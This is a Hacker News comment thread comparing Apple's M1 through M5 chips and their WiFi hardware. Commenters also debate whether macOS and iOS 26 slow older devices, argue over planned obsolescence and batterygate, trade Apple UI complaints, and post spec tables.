    The Broadcom WiFi chip supports 320MHz, while the N1 is stuck at 160MHz. There were reports of the N1 not supporting 4096 QAM as well, but I didn't check.

    • ExoticPearTree 19 hours ago

      > The Broadcom WiFi chip supports 320MHz, while the N1 is stuck at 160MHz.

      I was at a Wi-Fi vendor presentation a while back, and they said that 160MHz is pretty improbable unless you're living alone with no wireless networks around you. And 320MHz even less so.

      In real life, probably the best you can get is 80MHz in a really good wireless environment.

      • shadowpho 18 hours ago

        For which band? I run 160/160 on 5/6GHz and it’s nice. They are short-range enough to work. For 2.4, yeah, 20MHz only.

        • greg5green 16 hours ago

          For 5GHz, that's pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160MHz.

          For 6GHz? Yeah, not uncommon.

      • amluto 19 hours ago

        I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

        WiFi does not currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

        • astrange 16 hours ago

          OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.

          • ksec 7 hours ago

            Given that WiFi 6 was the trial run, I expect WiFi 7 to have OFDMA ironed out. And MLO not to be working until WiFi 8.

      • mrtesthah 16 hours ago

        Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4GHz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?

        • 0x457 14 hours ago

          My limited experience:

          2.4GHz is pretty much only used by IoT; you generally don't care about channel width there. When your client device (laptop, phone) downgrades to 2.4GHz, it might as well disconnect, because it's unusable.

          5GHz gets stopped by drywall, so unless your walls are just right to bounce the signal off, you need an AP in every room. Ceiling mounting is pretty much required, and you're pretty much free to use channels as wide as your devices support and local laws allow.

          6GHz gets stopped by a piece of paper, so it's the same as 5GHz, except you won't get 6GHz unless you have a direct line of sight to the AP.

    • HumblyTossed 20 hours ago

      "stuck".

      An infinitesimally small percentage of people can take advantage of 320MHz. It's fine.

      • londons_explore 20 hours ago

        Today. But in 3 years' time it'll be widespread, and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.

        • landl0rd 16 hours ago

          It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use out of 320MHz channels, beyond maybe very large LAN file transfers that are for some reason happening over WiFi.

          • fragmede 15 hours ago

            Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading various 10+ GiB files to test with, and users couldn't possibly conceive of a NAS, never mind owning one, because Netflix has never removed shows while people were watching them, breaking an assumed promise to users. ISP speeds are never ever going to improve either. Everyone knows that!

        • shwaj 17 hours ago

          How does it “jam up the airwaves” if it’s operating at a different frequency than the devices you say it will be jamming?

    • Avamander 15 hours ago

      Channel width is not the only thing that determines the usability or quality of a chipset though.

      Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

    • t-3 20 hours ago

      I doubt the number of people in both the "has no neighbors" and "owns Apple hardware" camps is significant at all.

    • MrBuddyCasino 19 hours ago

      I don’t think 4096 QAM is realistic anyway, except if your router is 10 cm away from your laptop.

  • fx1994 2 hours ago

    That's why I did not upgrade :) I upgraded a VM, and when I saw how slow it was, it was a no-no for my M2...

  • Insanity 20 hours ago

    Yeah, I love my M1 iPad Pro, but the Liquid Glass update made it feel slower. Really only the 'unlock' feels slower; once I'm using it, it's fine. But it's slightly annoying and does make me want to upgrade this year to the M5.

    But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

    • asimovDev 19 hours ago

      my dad's got a pre-Apple Silicon iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this

      • baq 14 hours ago

        I have a 5th gen? Can’t even remember now it’s so old. Nothing works anymore except Netflix, YouTube and Disney, and that only after a minute or so.

        Which is fine, since it’s exclusively used to watch a kids show for a half an hour a day.

        …but it’s also super sad to see a once-fantastic piece of kit degrade so much, primarily due to software.

    • knowitnone3 18 hours ago

      "make me want to update this year to the m5." Then Apple software devs did what they were told

  • dawnerd 19 hours ago

    I’m still daily driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance-wise. The only thing is maybe more RAM, as the need for that keeps growing - I’m sitting just under 30GB when running a bunch of containers.

  • lelandfe 20 hours ago

    As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges in Apple’s software when it used to astound. iOS Settings search will flash “No Results” as you begin to type, which is comically amateurish. The macOS menu bar control panels can’t be keyboard-navigated... It’s just silly.

    I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

    • vessenes 19 hours ago

      Liquid Glass feels rushed to me. Tons of UI annoyances, especially on iPhone - it's suddenly many clicks to get to prior calls, for instance, a core way I call people. I imagine it will get ironed out over the next two years.

      • bombcar 15 hours ago

        It really does. It’s a two-year update, and they should have had two teams - one for Liquid Glass working toward the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.

    • hn111 3 hours ago

      I’ve been having the same idea for a while. I think it would be a great way to push them to prioritize stability a bit more, by publicly displaying how shamefully the UI behaves.

      Interested in collaborating on this? Perhaps a simple open-source static blog built with Astro?

    • jerf 18 hours ago

      "iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

      I'd love to agree that it's comically amateurish, but apparently there's something about settings dialogs that makes them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft Start menu is also comically slow if you try to access control panels through it, although it's just comically slow at search in general. Even Brave here visibly chokes for like 200ms if I search in its preferences dialog... which compared to Android or Windows is instant, but still strikes me as a bit on the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

      Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

      (The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

      • vizzier 17 hours ago

        Might have to be more specific than Android and Windows. Tried them on my devices (S24, Windows 11) and they're practically instantaneous.

      • robenkleene 17 hours ago

        The parent isn't commenting on the speed of search, just that saying "No Results" when they really mean "we're still checking for results" is bad UI (which I agree with).

        • array_key_first 13 hours ago

          The speed is bad too. At least on Android, it does actually take 5-10 seconds sometimes. That's not an exaggeration.

          It should be searching, what, a few hundred strings? What is it doing? Is it making a network call? For what?

          Anyway, barely related, but it does bring into question the quality of modern software.

        • fodkodrasz 16 hours ago

          It is possibly the null-value pattern in action, which is a good thing in my opinion (as in, robust), though displaying it this way is a bit suboptimal.

          Funny that I'm defending them, but I think this is not even a papercut, while they have far bigger issues.

          • fragmede 14 hours ago

            I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that are particularly annoying is that Apple's stuff used to be so exceptionally polished. Not sure what emotion I want to project onto them as to why they're like this now (or if it's even actually true), but the perception is that if they're no longer getting the little stuff like that polished anymore, what else just isn't being done to the same high standard?

            • NetMageSCW 13 hours ago

              Lots of things. iOS has never implemented the iPod USB interface properly and whoever thought listing music alphabetically was a good default should be fired.

      • SoKamil 17 hours ago

        The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.

    • jtbayly 19 hours ago

      Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

      1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the Calendar app on my Apple Watch, tap on the meeting, and tap the address. (I don't have an Apple Watch.)

      2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

      3. It is impossible to share a contact card from Messages.app (both iOS and macOS). You have to leave Messages, go to Contacts and select the contact to share. Contacts should be one of the apps that shows up in the "+" list, like Photos, Camera, Cash, and plenty of third-party apps.

      4. You still have to set the default system mail app in macOS as a setting in Mail.app, instead of in System Settings. Last I checked, I'm pretty sure you couldn't do this without first setting up an account in Mail.app. Infuriating.

      • grincho 17 hours ago

        I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.

        • jtbayly 8 hours ago

          Wow. I didn’t even know it was possible to drag and drop between apps on iOS. TIL. Thanks!

    • butlike 20 hours ago

      iirc, there's a setting to make the menu bar navigable. you just need to "alt+tab" to it with some weird button combo, like Ctrl + Cmd + 1 or something.

      • lelandfe 19 hours ago

        You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

        But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

        And the answer, of course, is the same for so many of macOS's present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still has yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

        Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

        Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

        Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

        ...Anyway.

  • seunosewa 17 hours ago

    My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.

    • raspasov an hour ago

      Probably building a Spotlight index or something of that sort.

  • dimal 14 hours ago

    Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.

    • bsimpson 14 hours ago

      This feels like it's always been true.

      Devices get slower for no perceivable reason, when in reality software at every level makes ever-greater assumptions about how much power you have, and squanders it more readily.

  • JumpCrisscross 17 hours ago

    > Tahoe however makes my M1 Air feel sluggish

    Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

    • quadyeast 16 hours ago

      mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.
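
      For anyone wanting to spot the same kind of runaway daemon, here's a minimal Python sketch (assuming macOS's BSD-style ps, where -r sorts by CPU and -c trims to bare command names):

          import subprocess

          # Print the header plus the five most CPU-hungry processes.
          out = subprocess.run(["ps", "-Arco", "pcpu,comm"],
                               capture_output=True, text=True, check=True).stdout
          print("\n".join(out.splitlines()[:6]))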

  • butlike 20 hours ago

    I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and what's marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for Apple's subtle nudge to upgrade makes sense to me.

    It feels very much like how I imagine someone living in the late 1800s might have felt: the advent of electricity, the advent of cars, but unable to predict airplanes, even though they're right around the corner and will likely be seen in their lifetime.

  • throw0101d 9 hours ago

    > The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

    I think many IT departments will be thankful for that, as Wi-Fi behaviour can be challenging, and hopefully it will lower ticket counts.

  • jbverschoor 3 hours ago

    >> Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years

    Quit the Dropbox app; it's Electron, and it's brand spanking new.

  • nixpulvis 11 hours ago

    I would be soo excited if Apple split out the hardware and software orgs and moved to make the hardware more standardized, with macOS/iOS/etc. being just one consumer.

    Not going to happen, but I can dream.

  • sharts 5 hours ago

    The reason for better hardware is so software can lag more.

  • pantalaimon 20 hours ago

    Won't that make Linux support even harder :/

  • DecentShoes 14 hours ago

    They always release a slowdown update to destroy their older hardware. I don't know why you're even questioning it

    • red369 11 hours ago

      I agree with your feeling about Apple devices eventually getting updates to the point they become sluggish. I have just reached that point with iOS 26 and my iPhone 13 mini.

      I am undecided in my thoughts about how malicious this is. Do people think that it is something like wanting to cram more features into the operating systems, and they are careless how it affects the earliest supported models? Or do most people think it is planned obsolescence?

      Apple generally offer updates longer than Android, so is it more pronounced on iPhones than Android phones? I remember seeing similar slow-downs on Android phones in the past.

      Apple generally offer updates for iOS for less time than Windows. I don't really have a feel for the difference between the two in terms of how much new versions slow down older hardware.

      Obviously, separating feature updates from security updates would be a way to address this, and it's not possible that no one at Apple has considered the idea. They are a business, and selling new products is unfortunately a disincentive pushing them away from doing that.

      • rester324 9 hours ago

        Apple was fined all over the world for intentional, malicious software slowdowns by courts in many countries. Just google "batterygate". At this point it is a proven fact that Apple had been doing this. I am pretty sure they continue to do so. Why would they stop?

        • tiltowait 8 hours ago

          The slowdown occurs on systems that can't hold sufficient charge to reliably power the CPU to full anymore. If the battery can't supply the expected voltage, then the system simply shuts off. That is much worse than slowing down. This feature inarguably increased longevity—hardly what I'd expect from a "planned obsolescence" scheme.

          They did make a mistake, though: they should have been up-front about it. They should have advertised it rather than hiding it away.
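
          To make that mechanism concrete, here's a toy sketch of voltage-aware frequency capping. All numbers are made up; this is just the shape of the idea, not Apple's actual logic:

              # Battery voltage under load sags roughly as V = V_oc - I * R_internal,
              # and R_internal grows as the battery ages.
              CUTOFF_V = 3.0  # hypothetical brown-out threshold

              def max_safe_freq_ghz(v_open_circuit: float, r_internal: float) -> float:
                  # Rough current draw per frequency step (GHz -> amps); numbers invented.
                  draw = {3.2: 5.0, 2.4: 3.5, 1.8: 2.5, 1.2: 1.8}
                  for freq, amps in sorted(draw.items(), reverse=True):
                      if v_open_circuit - amps * r_internal >= CUTOFF_V:
                          return freq  # fastest step that won't brown out
                  return 0.6  # floor: keep running, just slowly

              print(max_safe_freq_ghz(3.8, 0.10))  # healthy battery -> 3.2
              print(max_safe_freq_ghz(3.8, 0.25))  # aged battery -> 1.8

          With a healthy battery the full clock is safe; as internal resistance rises, the same logic quietly caps the clock instead of letting the SoC brown out.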

    • 0xWTF 6 hours ago

      Meanwhile Ubuntu is still snappy on my original 2012 rMBP. It got a new screen, two new batteries, still has the last supported version of macOS installed if I want it. Still sparks joy. If only my fingers could keep the Ubuntu cmd and ctrl key functions properly mapped.

  • WhitneyLand 19 hours ago

    “nobody really needs to upgrade that for most things”

    Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

    AI, dev, some content scenarios, etc…

  • lawlessone 17 hours ago

    >The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

    A rant on my part, but a computer from 10 years ago would be fine for what most people do on their computer, if not for software bloat...

  • random3 17 hours ago

    This needs benchmarks.

    Sad if true. My M1 Max has felt sluggish lately too, after bragging that this was the longest-lived work machine I've had and thinking I'm good to wait for the M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

    I think they bet a lot of hardware money on AI capabilities but failed to deliver the software, so there was no real reason to upgrade for the AI features in the chip (which is literally what they boast about on the first line of the announcement - yet nobody cares about making more cute faces).

    It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing", so even if they didn't believe it they still needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

  • antipaul 17 hours ago

    Which is harder these days, software or hardware?

    • DSingularity 16 hours ago

      Each is challenging in its own way. The real challenge is that we need codesign, and that's the tricky part.

  • phamduongtria 16 hours ago

    Even the M4 Max MacBooks I tried in the stores were running like shit on Tahoe.

  • thenaturalist 18 hours ago

    Don't kid yourself: planned obsolescence is real.

    Apple has a higher duty to their shareholders than to their customers.

    Not hating on Apple, just stating the hard economic truth.

    • NetMageSCW 13 hours ago

      Nope, never been real, never will be real. Just conspiracy theories like all the others.

      PS The Earth isn’t flat. We did go to the Moon. Vaccines don’t cause autism.

      • otikik 2 hours ago

        Planned obsolescence is not a conspiracy. Apple specifically has been proven to sneakily add "silently slow down the hardware" behavior to their updates. And examples of planned obsolescence abound.

      • thenaturalist 16 minutes ago

        Yes, it's real, and it's plain funny that you dismiss simple facts in a case as obvious and as well-documented as Apple's.

        From the 2005 iPod settlement [0], to the 113 million USD Batterygate settlement [1], to Flexgate [2], where Apple only escaped settlement due to plausible deniability.

        To quote from Batterygate:

        > Apple has agreed to pay millions of dollars to 34 states over its controversial previous practice of deliberately slowing down older iPhones to extend their battery life.

        > [...]

        > Many believed it was an effort to encourage users to buy new iPhones.

        I agree on all your "PS" points; where we seem to differ is that reading is a virtue, and not knowing something because you haven't heard of it doesn't make it a conspiracy theory.

        0: https://www.cbsnews.com/news/ipod-class-action-suit-settled/

        1: https://edition.cnn.com/2020/11/19/tech/apple-battery-settle...

        2: https://www.macrumors.com/2021/07/20/flexgate-class-action-l...

  • imcritic 20 hours ago

    [flagged]

    • mumber_typhoon 20 hours ago

      What I have seen with iPhones is that the RAM has gone from 4GB to 12GB very quickly, compared to how long it took to go from 1GB to 3GB.

      Apps used to use less RAM, but over the years they have become bigger and more complicated. This is probably why older iPhones feel sluggish: newer iPhones have more memory, so apps snap back faster, and they also have faster storage and more memory bandwidth to reduce the latency of reading more data from flash.

      Batteries are also a problem, as maintaining voltage is difficult for a 2-3 year old battery. An official battery swap at an Apple service center for a 3-year-old iPhone will make it run much better.

      I used to believe (and sometimes I still do) that Apple intentionally makes everything heavier to make old phones and devices feel slower, but I don't think that's the case.

      I think more is happening on newer phones and devices, so the same task feels slower on an older device. This happens a lot faster with iPhones and phones in general (a year or two) as opposed to Macs/computers, which can take 4-5 years to show signs of aging.

      My 2018 Intel computer feels very slow in 2025 running GNOME. No one slowed it down. It's just that the 2025 world of software is a lot heavier, and 2026's will be heavier still.

      • bloppe 20 hours ago

        Apple has been proven to intentionally slow down older devices, but it's definitely not to inflate their profits. It's just a way to kindly preserve your old battery for you. And they try to keep it a secret from you so you don't get confused.

        • rsynnott 19 hours ago

          … Eh? It was neither. It was due to a design defect in a particular model; if voltage fell into a range that was perfectly possible with an aging but still functional battery, the SoC would shut off. The only viable software fix was to clock it down instead (there was an option to decline that and risk the abrupt shutoffs).

          Not really sure what else they could have done there.

          • bloppe 19 hours ago

            It's not a particular model. It's every model. And it's just interesting that no other manufacturer seems to have the same problem. iPhones are just too advanced, I suppose.

      • HumblyTossed 20 hours ago

        Apps are heavier because a lot of them do not use native code. It's all cross platform BS. And they include a lot of A/B code as well. Really wish Apple would nip that all in the bud.

    • the_other 20 hours ago

      My iPhone X worked fine for 7 years, even without a battery replacement. It still works just fine. I wanted a larger screen and better zoom lens, so I upgraded earlier this year but I absolutely didn't have to and didn't feel any pressure from Apple to do so.

      n=1.

    • alimbada 20 hours ago

      I've been using an iPhone 11 for 4 years now (also, reminder: the 11 was launched 2 years prior to when I bought mine). I replaced the battery earlier this year as it wouldn't last to the end of the day any more but besides that it's showing no slowdowns or any other issues.

      • bombcar 20 hours ago

        Do you have iOS 26 on it? That pigdog is making my 15 Pro Max sweat and cry.

        • icedchai 20 hours ago

          I have an iPhone 13 and haven't upgraded yet. Sounds like I should hold off.

          • criddell 20 hours ago

            I have an iPhone 13 Mini and upgraded it to iOS 26, and it seems fine to me.

            I also have a 2018 iPad Pro, put iPadOS 26 on it, and haven't had any issues either, except that sometimes my keyboard is slow to connect. I'm not sure if that's the software or the hardware, though.

          • bombcar 20 hours ago

            I haven't really found anything that blew my socks off, and the number of "strange bugs" (not even talking about the UI complaints, just things like "touch stops working suddenly" and other weird things) is too damn high.

            • icedchai 19 hours ago

              I'll probably wait for 26.1 then!

        • alimbada 20 hours ago

          I only just upgraded to iOS 18 recently. I'm unlikely to go to 26 unless there's a good reason to do so.

        • rsynnott 19 hours ago

          Never, ever, upgrade to any Apple OS until at least .1. .0 is _always_ broken.

        • chasd00 19 hours ago

          I don't see what the big deal is with iOS 26. It looks a little bit different; everything now seems to have some degree of transparency, but everything works the same.

    • tempoponet 19 hours ago

      They support their phones for years longer than any other vendor. This has been widely understood for probably 10+ years at this point.

      There's plenty of room for criticism without a blanket conspiracy that doesn't match what most can observe.

    • endemic 20 hours ago

      No more than any other company.

  • wartywhoa23 15 hours ago

    > ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

    I've been hearing this since the Intel 486DX days, and

    > Nobody will ever need more than 640K of RAM!

    • bombcar 15 hours ago

      This is the first time I've gone four+ years without even a real desire to upgrade; I have a hard time figuring out what would even be faster.

      Amusingly enough, adding more ports could do it.

  • rester324 9 hours ago

    If Tahoe made the M1 slower, then I am sure it was intentional. Apple has done this in the past and been fined hundreds of millions by courts all over the world. So I am pretty sure they continue to slow software down intentionally on older hardware. You can google "batterygate" and see for yourself.

hereme888 16 hours ago

Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15437 (9-core sample)

  • runjake 14 hours ago

    Let's see if I can turn this into an ASCII table and have it survive HN's reformatting.

        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | Chip | Process          | CPU Cores    | GPU      | Neural Engine  | Memory Bandwidth  | Unified Memory    | Geekbench6 (Single/Multi) |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | M1   | 5 nm             | 8 (4P+4E)    | 7–8      | 16-core Neural | 68.25 GB/s        | 16 GB             | ~2346 / 8346              |
        | M2   | 5 nm (G2)        | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2586 / 9672              |
        | M3   | 3 nm (first-gen) | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2965 / 11565             |
        | M4   | 3 nm (second-gen)| 10 (4P+6E)   | 8–10     | 16-core Neural | 120 GB/s          | 32 GB             | ~3822 / 15031             |
        | M5   | 3 nm (third-gen) | 10 (4P+6E)   | 10       | 16-core Neural | 153 GB/s          | up to 32 GB       | ~4133 / 15437 (9-core)    |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+

    • jacobolus 12 hours ago

      Or to fit in a narrower window:

        Chip | Process | CPU       | GPU  | Neural  | Memory      | Unified | Geekbench6
             |         | Cores     |      | Engine  | Bandwidth   | Memory  | Single / Multi 
        -----|---------|-----------|------|---------|-------------|---------|----------------------
        M1   | 5 nm G1 |  8: 4P+4E | 7–8  | 16-core |  68.25 GB/s |  16 GB  | 2346 / 8346          
        M2   | 5 nm G2 |  8: 4P+4E | 8–10 | 16-core | 100    GB/s |  24 GB  | 2586 / 9672          
        M3   | 3 nm G1 |  8: 4P+4E | 8–10 | 16-core | 100    GB/s |  24 GB  | 2965 / 11565         
        M4   | 3 nm G2 | 10: 4P+6E | 8–10 | 16-core | 120    GB/s |  32 GB  | 3822 / 15031         
        M5   | 3 nm G3 | 10: 4P+6E | 10   | 16-core | 153    GB/s | ≤32 GB  | 4133 / 15437 (9 core)

      • thenberlin 7 hours ago

        This is somehow the most Hacker News thread I've ever seen and I love it.

        • bbor 5 hours ago

          It's perfectly HackerNews, I agree -- any other forum would have native support for Markdown, which solves this problem much more cleanly!

          Maybe they'll finally turn it on for Markdown's 25th anniversary in a few years? A man can dream...

          • d0ugal 21 minutes ago

            For one day only every 25 years.

      • momojo 10 hours ago

        Doing the lord's work.

      • geuis 7 hours ago

        Needs to be even more narrow. (iPhone 16pro landscape Safari).

      • someothherguyy 6 hours ago

        To make it narrower, place the redundant units in the header.

        • vietvu 6 hours ago

          and replace first, second... with 1st, 2nd...

      • tpowell 7 hours ago

        Can I get YoY % improvements to the Geekbench scores in another column? I double-dog dare you.
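
        For what it's worth, a quick Python sketch of the gains from the numbers above (the cadence is only roughly annual, so this is generation-over-generation rather than true YoY, and the M5 multi-core figure is the 9-core sample):

            # Base-model Geekbench 6 (single, multi) scores quoted upthread.
            scores = {
                "M1": (2346, 8346),
                "M2": (2586, 9672),
                "M3": (2965, 11565),
                "M4": (3822, 15031),
                "M5": (4133, 15437),  # multi is the 9-core sample
            }

            chips = list(scores)
            for prev, cur in zip(chips, chips[1:]):
                s = scores[cur][0] / scores[prev][0] - 1
                m = scores[cur][1] / scores[prev][1] - 1
                print(f"{prev} -> {cur}: single {s:+.1%}, multi {m:+.1%}")

        That works out to roughly +10%/+16% for M1 -> M2, +15%/+20% for M2 -> M3, +29%/+30% for M3 -> M4, and +8%/+3% for M4 -> M5 (single/multi).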

    • kjkjadksj 8 hours ago

      Looks brutal on mobile

  • nu11ptr 15 hours ago

    The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

    Update: I am thinking the 24GB for M5 is a typo. I see on Apple's site the 14 inch MBP can be configured optionally with 32GB of RAM.

    • makeramen 15 hours ago

      That seems like a typo or incorrect info; the M5 MBP can definitely be configured up to 32 GB, and the Apple page explicitly mentions 32 GB as well.

    • candeira 5 hours ago

      I could be wrong about this but, if I had to guess, I'd say the 24GB M5 chips/systems exist due to binning.

      Apple is designing and manufacturing a chip/chipset/system with 32GB of integrated memory. During QA, parts that have one non-conformant 8GB internal module out of the four are reused in a cheaper (but still functional) 24GB product line rather than thrown away.

      Market segmentation also has its hand in how the final products are priced and sold, but my strong guess is that, if Apple could produce 32GB systems with perfect yield, they would, and the 24GB system would not exist.

      • angoragoats 5 hours ago

        The memory is not on-die, it's separate (completely standard) memory chips, either LPDDR4X or LPDDR5 depending on which M-series CPU you're looking at. So binning doesn't really apply.

        • candeira 2 hours ago

          Seems like there's a misunderstanding on my part here. <reads more>

          Ah, the memory is integrated in the same package (the "chip" that gets soldered onto the motherboard) as the integrated CPU/GPU, and I had understood that correctly. However, I had incorrectly surmised that it was built into the same silicon die.

          Thanks for the correction!

          Lesson: TIL about the difference between a System-in-Package (SiP) and a System-on-Chip (SoC), and how I had misunderstood the Apple Silicon M-series processors to be plain SoCs when they're SiPs.

    • eftychis 15 hours ago

      I had the same question, but I can only speculate at the moment. The cynical part of me thinks along similar lines: create an artificial differentiation and push people to upgrade.

      If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

      • brailsafe 13 hours ago

        They definitely do that. You could get 64GB of RAM without going up to the top-spec Max tier of CPU in the M1 and M2 generations. But with the M4 Pro you can only do 24 or 48GB, while on the lower-spec M4 Max you can only do 36GB and nothing else; only the absolute best CPU can do 64GB. So if you were otherwise going to get the 48GB M4 Pro, you'd have to spend another ~$1200 USD to get another 16GB of RAM, if all you cared about was RAM.

        There may be a technical explanation for it, but incentives are incentives.

        • matt-p 10 hours ago

          You can get 64GB on the Mini with the M4 Pro, which lends credence to there being no technical reason. But at the same time, if the business reason were strong, why allow it on the Mini but not in a MacBook? I think this is equally likely to be about reducing SKUs or something, e.g. they found that most people buying 64GB of RAM also buy the upgraded processor.

    • christkv 15 hours ago

      They still have an option for 32GB.

    • surcap526 14 hours ago

      Apple is running a planned obsolescence scam.

      • umanwizard 13 hours ago

        M1 MBPs are still great laptops. In fact there are even Intel models from 2019 that are still officially supported. Apple is pretty much the last company it makes sense to accuse of planning obsolescence.

        • mschuster91 13 hours ago

          Yup, but only on the hardware side. On the software side you are entirely at their mercy. Unlike Windows, which goes to utterly ridiculous lengths to keep software dating back to the Windows 95 era running on top-notch Windows 11 systems, Mac developers are all too used to having to constantly keep up with whatever crap Apple has changed and moved around this time.

          • ben_w 13 hours ago

            I've tried running the old Civ2 on a recent Windows machine; no dice.

            I'm sure it's possible to do that, but the backwards compatibility on Windows is definitely not as good as you say.

            That said, as a fun personal project I'm currently converting a game originally intended to work on 68k Macs, which still has parts explicitly labelled as being for resource forks. I've lived through (and done work on) 68k, PPC, Intel, and M-series hardware, plus all the software changes, so I agree with you about Apple.

            • Uvix 6 hours ago

              Civ2 was 16-bit... did you try running it on 32-bit Windows 10, or only on 64-bit?

            • chj 12 hours ago

              I think there is an x64 patch you need to apply.

            • platevoltage 7 hours ago

              This gave me a flashback of me as a kid messing around with the "resource fork" of Mac applications. I felt like a major hackerman back then. During the era of "free" dialup ISPs, I would effectively remove the giant ad banners they all had.

          • tgma 13 hours ago

            Windows, huh?

            Pulled shenanigans wrt TPM requirements for Windows 10 and 11. Actively trying to make sure people log in to a Microsoft Account, and making it hard to use local accounts.

            > Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

            Mmm...

              Win16 API
              Win32 API (including variants like GoodLuckSystemCallExExEx2W(...))
              MFC
              ATL
              .NET WinForms
              .NET Avalon/WPF
              Silverlight
              MAUI
              ...
            • cyberax 11 hours ago

              The thing is, MFC/ATL are _still_ supported, with the last release in October 2024. And the Win32 API is so stable that people joke it's the only stable API on Linux.

              .NET technologies... Yeah, MS dropped the ball there.

            • mschuster91 13 hours ago

              For what it's worth, I mostly run Macs, except for ham radio stuff, because there's just so much that is only available on Windows.

              The thing with all the mentioned APIs is that, excluding 16-bit stuff (which got yeeted in Win7 x64, though if you needed it you could run Win7 x32), you can still run software using them without too much hassle, and you can most probably compile it if you need to fix a bug.

